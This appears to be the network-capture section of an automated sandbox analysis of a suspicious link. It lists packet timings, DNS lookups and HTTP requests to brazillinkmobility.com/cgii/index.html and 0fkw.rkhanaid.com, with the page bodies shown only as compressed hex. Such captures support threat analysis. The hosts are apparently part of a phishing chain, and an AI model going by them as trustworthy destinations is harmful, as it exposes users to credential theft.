                          Nov 25, 2024 17:56:46.051706076 CET49777443192.168.2.4172.217.21.36
                          Nov 25, 2024 17:56:46.051737070 CET44349777172.217.21.36192.168.2.4
                          Nov 25, 2024 17:56:47.076431036 CET4434980313.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.077037096 CET49803443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.077075958 CET4434980313.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.077552080 CET49803443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.077559948 CET4434980313.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.183444023 CET4434980413.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.184356928 CET49804443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.184376955 CET4434980413.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.184922934 CET49804443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.184928894 CET4434980413.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.461788893 CET4434980513.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.462815046 CET49805443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.462846994 CET4434980513.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.463331938 CET49805443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.463341951 CET4434980513.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.535094976 CET4434980313.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.535166025 CET4434980313.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.535244942 CET49803443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.535461903 CET49803443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.535509109 CET4434980313.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.535537958 CET49803443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.535554886 CET4434980313.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.539041042 CET49808443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.539098978 CET4434980813.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.539211035 CET49808443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.539396048 CET49808443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.539427042 CET4434980813.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.591029882 CET4434980613.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.591582060 CET49806443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.591605902 CET4434980613.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.592120886 CET49806443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.592132092 CET4434980613.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.715465069 CET4434980713.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.716272116 CET49807443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.716305971 CET4434980713.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.716840982 CET49807443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.716850042 CET4434980713.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.856146097 CET4434980413.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.856239080 CET4434980413.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.856295109 CET49804443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.856584072 CET49804443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.856606960 CET4434980413.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.856616974 CET49804443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.856623888 CET4434980413.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.860524893 CET49809443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.860563993 CET4434980913.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.860625982 CET49809443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.860886097 CET49809443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.860902071 CET4434980913.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.908128977 CET4434980513.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.908205986 CET4434980513.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.908261061 CET49805443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.908624887 CET49805443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.908649921 CET4434980513.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.908657074 CET49805443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.908663034 CET4434980513.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.911705971 CET49810443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.911747932 CET4434981013.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:47.911827087 CET49810443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.911963940 CET49810443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:47.911983013 CET4434981013.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.173216105 CET4434980613.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.173309088 CET4434980613.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.173372984 CET49806443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.176258087 CET49806443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.176289082 CET4434980613.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.176305056 CET49806443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.176311016 CET4434980613.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.189443111 CET49811443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.189491987 CET4434981113.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.189585924 CET49811443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.197710991 CET49811443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.197732925 CET4434981113.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.309870958 CET4434980713.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.309956074 CET4434980713.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.310009003 CET49807443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.310259104 CET49807443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.310281992 CET4434980713.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.310296059 CET49807443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.310302973 CET4434980713.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.313389063 CET49812443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.313436985 CET4434981213.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:48.313525915 CET49812443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.313685894 CET49812443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:48.313702106 CET4434981213.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.167568922 CET4434980813.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.168262959 CET49808443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.168363094 CET4434980813.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.168834925 CET49808443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.168852091 CET4434980813.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.672172070 CET4434981013.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.672789097 CET49810443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.672827005 CET4434981013.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.673316002 CET49810443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.673325062 CET4434981013.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.692961931 CET4434980813.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.693046093 CET4434980813.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.693109989 CET49808443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.693347931 CET49808443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.693375111 CET4434980813.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.693389893 CET49808443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.693397045 CET4434980813.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.696919918 CET49813443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.696966887 CET4434981313.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.697046995 CET49813443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.697196960 CET49813443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.697216988 CET4434981313.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.739017010 CET4434980913.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.739528894 CET49809443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.739562988 CET4434980913.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:49.740015984 CET49809443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:49.740022898 CET4434980913.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:50.047364950 CET4434981113.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:50.048250914 CET49811443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:50.048274994 CET4434981113.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:50.048782110 CET49811443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:50.048788071 CET4434981113.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:50.108108044 CET4434981013.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:50.108181953 CET4434981013.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:50.108288050 CET49810443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:50.108571053 CET49810443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:50.108599901 CET4434981013.107.246.63192.168.2.4
                          Nov 25, 2024 17:56:50.108618021 CET49810443192.168.2.413.107.246.63
                          Nov 25, 2024 17:56:50.108628988 CET4434981013.107.246.63192.168.2.4
                          TimestampSource PortDest PortSource IPDest IP
                          Nov 25, 2024 17:55:29.369632006 CET53497211.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:30.530024052 CET53577071.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:32.385402918 CET53641351.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:32.589181900 CET4929853192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:32.593492985 CET5629253192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:32.981709003 CET53562921.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:33.029841900 CET53492981.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:33.332459927 CET6039153192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:33.332707882 CET5725453192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:33.474046946 CET53572541.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:33.474078894 CET53603911.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:35.873891115 CET6219253192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:35.874105930 CET5352853192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:36.838459015 CET53535281.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:36.839052916 CET53621921.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:38.232577085 CET6378153192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:38.232819080 CET5103853192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:38.548388958 CET53637811.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:38.555109024 CET53510381.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:42.718247890 CET6272553192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:42.718247890 CET6459753192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:42.904520035 CET53645971.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:42.905003071 CET53627251.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:45.039361000 CET6247653192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:45.039525032 CET5959153192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:45.081425905 CET5500053192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:45.082175970 CET5172553192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:45.207637072 CET53624761.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:45.207662106 CET53595911.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:45.221656084 CET53550001.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:45.233907938 CET53517251.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:45.255367041 CET53655251.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:45.368324995 CET53554071.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:47.183897972 CET138138192.168.2.4192.168.2.255
                          Nov 25, 2024 17:55:49.152556896 CET5138753192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:49.152630091 CET6046953192.168.2.41.1.1.1
                          Nov 25, 2024 17:55:49.290667057 CET53513871.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:49.296411991 CET53604691.1.1.1192.168.2.4
                          Nov 25, 2024 17:55:49.350090981 CET53602141.1.1.1192.168.2.4
                          Nov 25, 2024 17:56:08.381165028 CET53626881.1.1.1192.168.2.4
                          Nov 25, 2024 17:56:29.471693993 CET53508871.1.1.1192.168.2.4
                          Nov 25, 2024 17:56:31.369005919 CET53509241.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Nov 25, 2024 17:55:32.589181900 CET192.168.2.41.1.1.10x393aStandard query (0)clickme.thryv.comA (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:32.593492985 CET192.168.2.41.1.1.10x447dStandard query (0)clickme.thryv.com65IN (0x0001)false
                          Nov 25, 2024 17:55:33.332459927 CET192.168.2.41.1.1.10xec22Standard query (0)www.google.comA (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:33.332707882 CET192.168.2.41.1.1.10x8b3Standard query (0)www.google.com65IN (0x0001)false
                          Nov 25, 2024 17:55:35.873891115 CET192.168.2.41.1.1.10x960cStandard query (0)brazillinkmobility.comA (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:35.874105930 CET192.168.2.41.1.1.10x3641Standard query (0)brazillinkmobility.com65IN (0x0001)false
                          Nov 25, 2024 17:55:38.232577085 CET192.168.2.41.1.1.10x4ef6Standard query (0)0fkw.rkhanaid.comA (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:38.232819080 CET192.168.2.41.1.1.10x25fStandard query (0)0fkw.rkhanaid.com65IN (0x0001)false
                          Nov 25, 2024 17:55:42.718247890 CET192.168.2.41.1.1.10xc74dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:42.718247890 CET192.168.2.41.1.1.10x654aStandard query (0)code.jquery.com65IN (0x0001)false
                          Nov 25, 2024 17:55:45.039361000 CET192.168.2.41.1.1.10x4b21Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:45.039525032 CET192.168.2.41.1.1.10x4d1bStandard query (0)code.jquery.com65IN (0x0001)false
                          Nov 25, 2024 17:55:45.081425905 CET192.168.2.41.1.1.10xbcdcStandard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:45.082175970 CET192.168.2.41.1.1.10x6d64Standard query (0)blogger.googleusercontent.com65IN (0x0001)false
                          Nov 25, 2024 17:55:49.152556896 CET192.168.2.41.1.1.10xfa50Standard query (0)blogger.googleusercontent.comA (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:49.152630091 CET192.168.2.41.1.1.10x51dbStandard query (0)blogger.googleusercontent.com65IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Nov 25, 2024 17:55:32.981709003 CET1.1.1.1192.168.2.40x447dNo error (0)clickme.thryv.comd1rsqi0l6b7evg.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                          Nov 25, 2024 17:55:33.029841900 CET1.1.1.1192.168.2.40x393aNo error (0)clickme.thryv.comd1rsqi0l6b7evg.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                          Nov 25, 2024 17:55:33.029841900 CET1.1.1.1192.168.2.40x393aNo error (0)d1rsqi0l6b7evg.cloudfront.net3.160.188.112A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:33.029841900 CET1.1.1.1192.168.2.40x393aNo error (0)d1rsqi0l6b7evg.cloudfront.net3.160.188.72A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:33.029841900 CET1.1.1.1192.168.2.40x393aNo error (0)d1rsqi0l6b7evg.cloudfront.net3.160.188.6A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:33.029841900 CET1.1.1.1192.168.2.40x393aNo error (0)d1rsqi0l6b7evg.cloudfront.net3.160.188.50A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:33.474046946 CET1.1.1.1192.168.2.40x8b3No error (0)www.google.com65IN (0x0001)false
                          Nov 25, 2024 17:55:33.474078894 CET1.1.1.1192.168.2.40xec22No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:36.839052916 CET1.1.1.1192.168.2.40x960cNo error (0)brazillinkmobility.com192.185.214.89A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:38.548388958 CET1.1.1.1192.168.2.40x4ef6No error (0)0fkw.rkhanaid.com104.21.55.245A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:38.548388958 CET1.1.1.1192.168.2.40x4ef6No error (0)0fkw.rkhanaid.com172.67.174.137A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:38.555109024 CET1.1.1.1192.168.2.40x25fNo error (0)0fkw.rkhanaid.com65IN (0x0001)false
                          Nov 25, 2024 17:55:42.905003071 CET1.1.1.1192.168.2.40xc74dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:42.905003071 CET1.1.1.1192.168.2.40xc74dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:42.905003071 CET1.1.1.1192.168.2.40xc74dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:42.905003071 CET1.1.1.1192.168.2.40xc74dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:45.207637072 CET1.1.1.1192.168.2.40x4b21No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:45.207637072 CET1.1.1.1192.168.2.40x4b21No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:45.207637072 CET1.1.1.1192.168.2.40x4b21No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:45.207637072 CET1.1.1.1192.168.2.40x4b21No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:45.221656084 CET1.1.1.1192.168.2.40xbcdcNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                          Nov 25, 2024 17:55:45.221656084 CET1.1.1.1192.168.2.40xbcdcNo error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:45.233907938 CET1.1.1.1192.168.2.40x6d64No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                          Nov 25, 2024 17:55:49.290667057 CET1.1.1.1192.168.2.40xfa50No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                          Nov 25, 2024 17:55:49.290667057 CET1.1.1.1192.168.2.40xfa50No error (0)googlehosted.l.googleusercontent.com142.250.181.65A (IP address)IN (0x0001)false
                          Nov 25, 2024 17:55:49.296411991 CET1.1.1.1192.168.2.40x51dbNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                          • clickme.thryv.com
                          • fs.microsoft.com
                          • brazillinkmobility.com
                            • 0fkw.rkhanaid.com
                          • https:
                            • code.jquery.com
                            • blogger.googleusercontent.com
                          • slscr.update.microsoft.com
                          • otelrules.azureedge.net
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449741192.185.214.89804416C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          Nov 25, 2024 17:55:36.961633921 CET452OUTGET /cgii/index.html HTTP/1.1
                          Host: brazillinkmobility.com
                          Connection: keep-alive
                          Upgrade-Insecure-Requests: 1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Encoding: gzip, deflate
                          Accept-Language: en-US,en;q=0.9
                          Nov 25, 2024 17:55:38.092192888 CET1236INHTTP/1.1 200 OK
                          Date: Mon, 25 Nov 2024 16:55:37 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, Keep-Alive
                          Last-Modified: Mon, 25 Nov 2024 12:01:19 GMT
                          Accept-Ranges: bytes
                          Vary: Accept-Encoding
                          Content-Encoding: gzip
                          Content-Length: 1605
                          Keep-Alive: timeout=5, max=75
                          Content-Type: text/html
                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 92 4f 6e db 46 14 c6 f7 3a c5 54 5d 48 42 64 2a dd 05 8d a4 c2 08 d0 75 81 a6 ab a2 a8 69 71 64 31 a0 48 81 a4 ed 18 86 97 bd 47 17 3d 47 2f d3 03 f4 0a a5 e2 56 51 f8 de f7 cd 23 e5 20 69 51 20 40 a8 e7 99 37 df 9f df 7c 53 6f b3 e5 c0 cd 37 3e 4e 9a ff dd 7c eb eb d8 ad 36 71 59 f9 7a 31 fc e1 f5 b7 67 2f 86 ef ff 90 c7 5b bf 18 de a4 fe 76 57 94 f5 d0 ad 8a bc f6 79 73 f0 36 4d ea cd 22 f1 37 e9 ca 9f bd fb 31 75 69 9e d6 69 9c 9d 55 ab 38 f3 8b af a2 e7 62 51 59 5c 16 75 75 b4 26 2f d2 3c f1 6f a7 2e 2f d6 45 96 15 b7 fb 2b f3 d9 df ea e6 97 45 72 b7 ff bf da c5 b9 db a4 49 e2 f3 e5 eb 8d 77 71 59 a7 55 ed 92 b4 da 65 f1 9d 4f dc c6 97 6e 17 a7 79 9d e6 57 95 8b 6b 57 37 a7 ae e2 2c f3 e5 5d 34 9f ed ef bf 5b fc b8 70 5e ad ca 74 57 2f 07 37 71 e9 fc 76 77 5d c5 6e e1 f2 eb 2c 7b 39 48 d7 e3 ac 58 c5 75 5a e4 d1 26 ae 36 6e b1 70 c3 e1 e4 7e d0 9a ba 8b 8b 97 83 c3 dd fd 8f 07 79 f7 8b 7f 2e 1f 0e 7e f0 f7 c7 3b ee c3 4b 51 9a af b2 eb c4 57 e3 d1 37 a3 c9 c4 a1 [TRUNCATED]
                          Data Ascii: OnF:T]HBd*uiqd1HG=G/VQ# iQ @7|So7>N|6qYz1g/[vWys6M"71uiiU8bQY\uu&/<o./E+ErIwqYUeOnyWkW7,]4[p^tW/7qvw]n,{9HXuZ&6np~y.~;KQW7Q+?}9h[]Y?L||X8EhxIvx]M&h]W*/W'I4h6oG0i?P.o~ys|RFT$,b_:\g+<>$>a4#2d(SAPj>j1 #O~`d+-9fyG /d^89enH+otJxS-w$7BH?9wTer_wIWr?7-zANwW-,wUDO~{'s5^iq2H_F__)sK_<;;*dO^jj$z,;JAN^H2:We_S`9<53 S#FD'$`\WZ/6#,-|Ygc$O`\JzWNMQ
                          Nov 25, 2024 17:55:38.092223883 CET684INData Raw: 8e dc 8f de 3d 65 6e 29 9a e4 dc bb 77 c4 33 07 e0 5f c4 03 79 57 d5 49 f4 04 09 e9 07 58 b0 77 32 57 e3 95 96 11 27 aa c7 e0 7e d2 8b 25 76 c2 92 e4 dc 1e a3 cc 1f f5 72 ca dc d2 0b ef 57 cd 87 f0 a6 f6 8b 40 22 d9 1a 7b 24 7d a9 52 91 71 e2 0b
                          Data Ascii: =en)w3_yWIXw2W'~%vrW@"{$}Rqsv$_=<.</$Ud0|%D<r%[t^<U#qE2s\BU<}YRkI"9<D.'AX|YAWb6EJ"


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449742192.185.214.89804416C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          Nov 25, 2024 17:55:49.133572102 CET403OUTGET /favicon.ico HTTP/1.1
                          Host: brazillinkmobility.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Referer: http://brazillinkmobility.com/cgii/index.html
                          Accept-Encoding: gzip, deflate
                          Accept-Language: en-US,en;q=0.9
                          Nov 25, 2024 17:55:49.494016886 CET1236INHTTP/1.1 404 Not Found
                          Date: Mon, 25 Nov 2024 16:55:49 GMT
                          Server: Apache
                          Upgrade: h2,h2c
                          Connection: Upgrade, Keep-Alive
                          Last-Modified: Thu, 29 Sep 2022 21:55:17 GMT
                          Accept-Ranges: bytes
                          Vary: Accept-Encoding
                          Content-Encoding: gzip
                          Content-Length: 4677
                          Keep-Alive: timeout=5, max=75
                          Content-Type: text/html
                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 [TRUNCATED]
                          Data Ascii: RmssgJ&av$NmRmHInM=_cpw~y3(\G(z}[832qQtjEl0;hQoAqK/^zPP`1PP%J^Vyg::<s}k9=v]Ivs8w>;]Np3xyvGe)e,v&FVIJqM3Hhp8(a{8jotEI.6q^>YZQH]rBis_4:Jar!c(j):{{d!5Dh4+k5yUD$wZ}YQO,5I>i6<]2XpCMe^Wh2.|~l'|v,sTWdG'8RFOE>8.V?\~[KJzp=4LB)YyuFMYb;Cd5[&TWRd{/_lyoY'+G;G\?zJL9*~"P,EO$}(OW<2X!SSQrxOx"#DJMAP!3-uH26?<gR;1<]9G$Vp0sBQ=f%afQmB<q
                          Nov 25, 2024 17:55:49.494038105 CET1236INData Raw: 7f 4d 5a 71 d4 a1 ce ba 30 26 a4 d2 ef d3 56 1c ef 82 80 96 ab 6b 14 93 95 8e 49 26 3b f9 fa 41 83 05 ea 7d 2a 6d a5 44 33 d4 a4 71 b1 99 49 63 79 2b 21 45 66 c8 7d ce 7e f9 e5 e0 60 b1 69 91 ef a6 ab dd a3 c9 f3 17 2f 7e 5d ec ba 42 9a b5 cd c3
                          Data Ascii: MZq0&VkI&;A}*mD3qIcy+!Ef}~`i/~]B&/VCS{.7T81),)V*RCx{k_hT!dnD3bxixqTHr2=-c/7UtoGc-'9_e$'(e66FANz=
                          Nov 25, 2024 17:55:49.494051933 CET1236INData Raw: 7e 09 ee a4 f7 b1 12 1a ac 6b 14 fa ee 29 32 c3 bd f3 f3 03 fe 8c 7a e3 85 c9 7f 5f 9a cc 0f 7c 7e cc 8d 47 d3 16 aa a5 c0 11 77 9c 06 70 2d f3 c2 71 9d 65 72 e7 67 b7 4d f9 97 a6 78 33 93 82 c8 22 5c 19 aa d0 38 89 76 00 b7 8c 58 2d df 59 8d 52
